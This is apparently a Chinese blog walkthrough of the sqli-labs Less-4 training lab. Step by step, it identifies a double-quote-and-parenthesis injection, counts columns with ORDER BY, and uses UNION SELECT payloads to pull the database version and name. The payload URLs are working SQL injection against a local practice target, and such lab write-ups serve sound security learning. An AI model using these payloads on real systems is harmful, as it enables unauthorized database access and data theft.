SQL注入靶场sqli-labs less-4

sqli-labs靶场第三关less-4

1、确定注入点

http://192.168.128.3/sq/Less-4/?id=1

http://192.168.128.3/sq/Less-4/?id=2

有不同回显,判断可能存在注入,

2、判断注入类型

输入

http://192.168.128.3/sq/less-4/?id=1 and 1=1

http://192.168.128.3/sq/less-4/?id=1 and 1=2

回显一致,猜测不是数字型注

加单引号

http://192.168.128.3/sq/less-4/?id=1'

没有回显,猜测其他闭合方式

输入双引号

http://192.168.128.3/sq/Less-4/?id=1"

报出错误

由结果判断闭合方式为 ")

3、确定列数

http://192.168.128.3/sq/less-4/?id=1") order by 5 --+

http://192.168.128.3/sq/less-4/?id=1") order by 4 --+

http://192.168.128.3/sq/less-4/?id=1") order by 3 --+

4,5回显报错,3的时候回显

确定列数为3

4、确定回显位

http://192.168.128.3/sq/less-4/?id=-1") union select 1,2,3 --+

确定2,3为回显位置

5、确定数据库名,数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()--+

5、爆出数据库名,表名,列名,数据

最终得到数据

大功告成

相关推荐
诗句藏于尽头1 小时前
完成ssl不安全警告
网络协议·安全·ssl
好奇的菜鸟2 小时前
如何在IntelliJ IDEA中设置数据库连接全局共享
java·数据库·intellij-idea
tan180°2 小时前
MySQL表的操作(3)
linux·数据库·c++·vscode·后端·mysql
满昕欢喜3 小时前
SQL Server从入门到项目实践(超值版)读书笔记 20
数据库·sql·sqlserver
Hello.Reader4 小时前
Redis 延迟排查与优化全攻略
数据库·redis·缓存
简佐义的博客5 小时前
破解非模式物种GO/KEGG注释难题
开发语言·数据库·后端·oracle·golang
爬山算法5 小时前
MySQL(116)如何监控负载均衡状态?
数据库·mysql·负载均衡
独行soc6 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
JAVA学习通6 小时前
Mybatis--动态SQL
sql·tomcat·mybatis
Me4神秘7 小时前
Linux国产与国外进度对垒
linux·服务器·安全